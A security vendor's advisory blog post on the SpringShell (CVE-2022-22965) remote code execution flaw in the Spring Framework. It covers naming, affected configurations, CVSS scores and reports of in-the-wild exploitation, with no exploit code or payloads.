SpringShell: What You Need to Know About This Vulnerability
March 30, 2022 • RBS
Update: This article was updated on April 25, 2022.
There is a new remote code execution (RCE) vulnerability developing in the background that security teams may be asked to remediate. Risk Based Security and Flashpoint have analyzed the “SpringShell” AKA “Spring4Shell” vulnerability. Compared to and rumored to be the next Log4Shell in some circles, it is another library vulnerability that could potentially affect a wide variety of software. As we continue to gather facts, we will update this article with any information that helps organizations decide if they should prioritize this issue. As of March 31, 2022, Spring has released a patch that addresses the vulnerability, and a release for Spring Boot is in progress.
Here’s a summary of what we know about SpringShell at this time:
SpringShell FAQ: How big of a threat is it?
Is it SpringShell or Spring4Shell?
Risk Based Security recognizes that a distinct “Spring Shell” project currently exists, which can make SpringShell’s name confusing. We sympathize with those who have voiced concerns and agree that SpringShell is a poor name.
However, since SpringShell has already been coined for this issue, we will continue to use it to avoid future misinformation. We also encourage others not to use the “Spring4Shell” variation since the ‘4’ is arbitrary, being used to reference the Log4j library. Spring4Shell implies that this issue is as severe as Log4Shell and current information does not support this.
Does SpringShell have a CVE ID?
SpringShell was disclosed on March 29, 2022. Two days later, SpringShell was assigned CVE-2022-22965. At this time, it is in RESERVED status but according to the vendor, the “specific exploit requires the application to run on Tomcat as a WAR deployment.” Our analysts have confirmed the vulnerability in this environment and it may affect other environments as well.
Is SpringShell exploitable right now?
A proof-of-concept (PoC) for remote execution has been published and validated for Spring Core. The PoC code leverages this vulnerability to modify Tomcat logging configuration to place shellcode into the log file achieving remote code execution.
At this time, the vulnerability currently affects JDK 9 and newer versions with exploits in the wild targeting applications running Tomcat as a WAR deployment. Even though it is relatively specific, since Spring Core is a library, the exploit methodology will likely change from user to user. More information will be needed to assess how many devices run on those needed configurations. Until then, SpringShell should not be seen as the next Log4Shell.
It has been reported that threat actors have attempted to exploit SpringShell to install the Mirai botnet. Recent reports have also observed attacks that are attempting to install cryptomining malware.
Does SpringShell have any limiting factors?
This issue reportedly affects applications using Spring Framework with Java Development Kit (JDK) 9 and newer versions. Veracode has also released additional details involving SpringShell’s exploitation and its limiting factors.
What are the CVSS scores for SpringShell?
SpringShell has a CVSSv2 score of 10.0 and a CVSSv3 score of 9.8 like most RCE vulnerabilities. However, the actual implementation of the vulnerable code may reduce risk, or manifest in numerous ways since it is both a framework and a library. This could change SpringShell’s impact, increase its access complexity, or require authentication to exploit. However, CVSS requires scoring it under a “worst case scenario” so the scores remain high:
CVSSv2 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
CVSSv3 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
How popular is the Spring Framework?
Spring Framework claims to be the world’s most popular Java framework, with major vendors such as Alibaba and Amazon contributing.
What are threat actors saying about SpringShell?
According to BleepingComputer, some sources have come forward stating that SpringShell is being actively exploited. Recent developments state that the Mirai malware is leveraging the SpringShell exploit to assimilate infected machines for DDoS attacks. GreyNoise has also come forward, stating that two “Spring” vulnerabilities, including SpringShell have been actively exploited in the wild. CISA added SpringShell to the Known Exploited Vulnerabilities Catalog on April 4, 2022.
SpringShell’s Further Updates
We will update this post as more details about SpringShell become known. Contact us to learn more about SpringShell, RCE issues, 0-day vulnerabilities, or the 93,000+ known vulnerabilities without a CVE ID.